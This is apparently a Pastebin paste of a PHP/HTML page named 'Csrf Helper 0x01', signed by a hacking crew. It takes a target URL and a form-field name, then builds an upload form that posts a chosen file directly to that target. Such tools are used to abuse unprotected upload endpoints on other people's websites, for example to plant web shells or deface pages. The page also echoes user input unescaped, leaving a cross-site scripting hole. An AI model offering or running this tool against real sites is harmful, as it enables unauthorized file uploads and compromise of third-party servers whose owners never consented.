Advertisement
ustadcage_48

CSRF

Oct 11th, 2017
608
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.22 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN"
  2. "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
  3. <head>
  4. <link href='http://fonts.googleapis.com/css?family=Prompt' rel='stylesheet' type='text/css'/>
  5. <title>.. Csrf Helper 0x01 ..</title>
  6. <style>body, input {font-family:Prompt;word-wrap:break-word;} input { -moz-border-radius: 9px;-webkit-border-radius:9px;border-radius:9px;border:1px solid #000;padding:4px;margin:none; } a {text-decoration:none;color:green;} </style>
  7. </head>
  8. <body>
  9. <center>
  10. <!-- coded by UstadCage_48 -->
  11. CSRF HELPER 0x01<br>
  12.   <form method="post" action="">
  13.   <input type="text" placeholder="http://" autocomplete="off" name="target">
  14.   <br>
  15.   <input type="text" placeholder="files[]" autocomplete="on" name="filename">
  16.   <br>
  17.   <input type="submit" name="lock" value="Locker">
  18.   </form>
  19. <?if($_POST['lock']){?>
  20.   <form target="_blank" method="post" action="<?=$_POST['target'];?>" enctype="multipart/form-data">
  21.  <input type="file" style="width:54%" name="<?=$_POST['filename'];?>">
  22.   <br>
  23.   <input type="submit" value="Upload">
  24.   </form>
  25.   <?}?>
  26.   &copy; 2016 Allright Reserved<br>
  27.   Powered By UstadCage_48 <br>
  28.   RES7OCK CREW
  29.   </center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement